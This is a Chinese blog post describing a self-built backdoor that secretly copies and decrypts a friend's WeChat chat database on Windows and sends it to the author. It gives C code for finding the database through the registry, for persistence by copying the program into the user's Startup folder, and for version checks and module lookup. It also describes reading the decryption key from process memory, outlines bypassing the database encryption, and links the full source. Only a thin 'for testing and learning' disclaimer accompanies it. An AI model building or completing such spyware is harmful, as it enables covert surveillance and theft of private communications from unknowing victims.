背景
前段时间在网上看文章,看到一篇微信解密数据库的文章,然后突然有了想法,如果有一个类似后门的程序,在朋友的电脑上运行后(无中生友)把聊天记录发送过来,岂不是很爽(直接被警察叔叔抓走)。
然后就去搜了文章和视频,主要学了关于微信逆向的各种操作,对微信的各个功能模块和行为流程有了初步的认识。
文章讲下部分功能的原理和实现方式,完整代码在最后,不会开发代码很渣,师傅们凑活看,仅用于测试与学习。
功能设计
内容
微信调用数据库的方法
微信的数据库使用的是sqlite3,数据库文件在C:UsersXXXDocumentsWeChat Files微信账号Msg这个路径下,默认路径需要根据注册表来判断:
HKEY_CURRENT_USER Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders的Personal
微信先加载数据库,后利用密钥解密,加解密用到了 sqlcipher。其中主要的聊天记录都在MSG文件中,体积也会比较大。
数据库解密
PC版微信数据库解密详细教程https://bbs.pediy.com/thread-251303.htm
这篇文章写的很详细,包括用OD找到密钥,脚本解密等。程序也用到了里面的解密脚本,但是出现了一个问题,就是大文件无法完全解密,从网上搜了下也没有解决方案,这个bug还需要研究下脚本才能解决。
定位密钥基址和获取密钥
通过OD获取密钥后,为了动态获取密钥,需要获取密钥的基址。使用FindWindow获取窗口句柄,然后用GetWindowThreadProcessId获取pid,OpenProcess打开进程句柄,利用CE找到的基址获取密钥,使用ReadProcessMemory读地址上的内容。和获取微信id,手机号,位置,昵称,二维码,头像的方法一致。比如这篇文章:
PC 微信 Hook 实战记录 1: 找到个人信息https://blog.csdn.net/weixin_30230009/article/details/105100181
功能实现
获取数据库位置
根据注册表获取微信默认位置,其中需要微信id,通过基址和偏移可以得到,具体想要获取的数据库名字需要自己改。。。
void getPath(unsigned char *dbpath)
{
char cmd_command[256] = { 0 };
char regname[] = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders";
HKEY hKey;
DWORD dwType = REG_BINARY;
REGSAM mode = KEY_READ;
DWORD length = 256;
int ret = RegOpenKey(HKEY_CURRENT_USER, regname, &hKey);
ret = RegQueryValueEx(hKey, "Personal", 0, &dwType, dbpath, &length);
if (ret == 0) {
RegCloseKey(hKey);
}
else {
printf("failed to open regedit.%d\n", ret);
}
开机自启
想要获取每一段时间内的聊天记录,所以想做个可持续发展。改注册表动静有点大,选择一种低权限的方式,将后门放到shell:startup 目录下,也就是当前用户的启动目录,启动电脑后程序也会启动。
int winStartUp()
{
unsigned char value[256] = { 0 };
char cmd_command[256] = { 0 };
char regname[] = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders";
HKEY hKey;
DWORD dwType = REG_BINARY;
REGSAM mode = KEY_READ;
DWORD length = 256;
int ret = RegOpenKey(HKEY_CURRENT_USER, regname, &hKey);
ret = RegQueryValueEx(hKey, "Startup", 0, &dwType, value, &length);
if (ret == 0) {
RegCloseKey(hKey);
}
else {
printf("failed to open regedit.%d\n", ret);
return0;
}
sprintf_s(cmd_command, "copy wechatdb.exe \"%s\" /B", value);
printf("%s\n",cmd_command);
system(cmd_command);
return0;
}
判断微信版本
只要获取了WeChatWin.dll的文件版本,也就获取了微信的版本,两者是相同的,由于不同微信版本的密钥基址不同,所以如果微信版本不符合程序就可以直接退出了。
DWORD IsWxVersionValid(WCHAR *VersionFilePath)
{
string asVer = "";
VS_FIXEDFILEINFO* pVsInfo;
unsignedint iFileInfoSize = sizeof(VS_FIXEDFILEINFO);
int iVerInfoSize = GetFileVersionInfoSizeW(VersionFilePath, NULL);
if (iVerInfoSize != 0) {
char* pBuf = newchar[iVerInfoSize];
if (GetFileVersionInfoW(VersionFilePath, 0, iVerInfoSize, pBuf)) {
if (VerQueryValue(pBuf, TEXT("\\"), (void**)&pVsInfo, &iFileInfoSize)) {
//主版本2.9.0.123
//2
int s_major_ver = (pVsInfo->dwFileVersionMS >> 16) & 0x0000FFFF;
//9
int s_minor_ver = pVsInfo->dwFileVersionMS & 0x0000FFFF;
//0
int s_build_num = (pVsInfo->dwFileVersionLS >> 16) & 0x0000FFFF;
//123
int s_revision_num = pVsInfo->dwFileVersionLS & 0x0000FFFF;
//把版本变成字符串
strstream wxVer;
wxVer << s_major_ver << "." << s_minor_ver << "." << s_build_num << "." << s_revision_num;
wxVer >> asVer;
}
}
delete[] pBuf;
}
printf("var = %s\n", asVer.c_str());
if (asVer == wxVersoin1)
return version1;
elseif (asVer == wxVersoin2)
return version2;
else
return0;
}
通过pid和模块名获取模块基址
用了网上现成的代码,我写代码挺菜的,基本都是copy,感谢前辈的分享。。。
PVOID GetProcessImageBase(DWORD dwProcessId, constchar* dllName)
{
PVOID pProcessImageBase = NULL;
MODULEENTRY32 me32 = { 0 };
me32.dwSize = sizeof(MODULEENTRY32);
// 获取指定进程全部模块的快照
HANDLE hModuleSnap = ::CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwProcessId);
if (INVALID_HANDLE_VALUE == hModuleSnap)
{
return pProcessImageBase;
}
// 获取快照中第一条信息
BOOL bRet = ::Module32First(hModuleSnap, &me32);
while (strcmp((char*)me32.szModule, dllName) != 0)
{
Module32Next(hModuleSnap, &me32);
}
pProcessImageBase = (PVOID)me32.modBaseAddr;
// 关闭句柄
::CloseHandle(hModuleSnap);
return pProcessImageBase;
}
测试
本机ip:192.168.18.4
虚拟机ip:192.168.154.130
总结和思考
UDP传输的不稳定性,网络原因导致数据库内容缺失,换成TCP传输更稳定。
数据库解密功能有bug,内容大于50m时无法解密全部内容,需要改善。
函数没有做安全性的处理,容易引发溢出等问题,被反日。
数据库的加密验证,往往只在于打开数据库的时候,一旦数据库被打开,剩下的操作,则不再对加密进行验证。因此,我们等数据库打开之后,获取db这个数值,然后就可以“非法”地调用sqlite3_exec函数,来执行我们期望的操作。如果这样操作,那么无论软件设计人员设计的任何加密方式,都形同虚设。也就是说,我们可以轻松地实现“绕过加密来访问SQLite数据库”。为了实现“绕过加密来访问SQLite数据库”,接下来需要解决三个问题:
如何取得已打开的数据库的句柄db的具体数值?
可被非法地调用的sqlite3_exec函数在哪里?
如何非法地调用sqlite3_exec函数?
还需要继续研究完善下功能。
github地址:
https://github.com/A2kaid/Get-WeChat-DB
最后补一句,仅用于测试与学习,禁止非法用途。
参考文章和项目
https://blog.csdn.net/qq_38474570/article/details/96606530PC微信逆向:两种姿势教你解密数据库文件
https://github.com/zzyzhangziyu/wechat-db-decrypt解密Windows微信聊天记录数据库
https://github.com/cdjjustin/UDPUDP大文件传输
https://www.52pojie.cn/thread-1084703-1-1.htmlPC微信逆向分析の绕过加密访问SQLite数据库
https://blog.csdn.net/weixin_30230009/article/details/105100181
网友评论